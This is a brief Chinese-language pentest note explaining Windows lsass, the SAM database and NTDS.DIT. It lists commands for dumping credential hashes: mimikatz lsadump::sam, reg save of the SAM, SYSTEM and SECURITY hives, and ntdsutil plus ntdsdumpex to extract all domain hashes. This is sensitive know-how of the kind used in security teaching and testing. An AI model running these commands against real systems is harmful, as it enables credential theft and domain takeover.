密码HASH

DeeLMind 提醒

注意权限问题！！！

lsass进程

lsass (Local Security Authority Subsystem Service)是一个 Windows 进程，负责处理操作系统的安全策略。例如，当您登录到 Windows 用户帐户或服务器时，lsass.exe 会验证登录名和密码。

SAM

安全帐户管理器 (SAM Security Accounts Manager) 是Microsoft Windows 操作系统 ( OS ) 中的一个数据库文件，其中包含用户名和密码。 SAM 的主要目的是使系统更加安全，并在系统被盗时防止数据泄露。SAM 可用于不同版本的 Windows，包括Windows XP、Windows Vista、Windows 7、Windows 8.1、 Windows 10和Windows 11。 在用户尝试登录期间，Windows 系统将要求输入用户名和密码。输入密码后，将根据 SAM 中的密码HASH进行验证。如果用户名和相关密码与 SAM 中的条目匹配，则会发生一系列事件。这最终将导致授予用户访问系统的权限。

%SystemRoot%\system32\config\

SAM文件

SAM存放本地用户HASH。

• 提取SAM

mimikatz lsadump::sam
reg save HKLM\SYSTEM system.hiv
reg save HKLM\SAM sam.hiv
reg save HKLM\SECURITY security.hiv

NTDS.DIT

NTDS.DIT存放域内所有用户HASH。

• 提取NTDS.DIT

ntdsutil "ac i ntds" ifm "create full c:\\users\\tmp" q q
ntdsdumpex.exe -d "C:\Users\tmp\Active Directory\ntds.dit" -o hash.txt -s C:\Users\vagrant\Desktop\system.hiv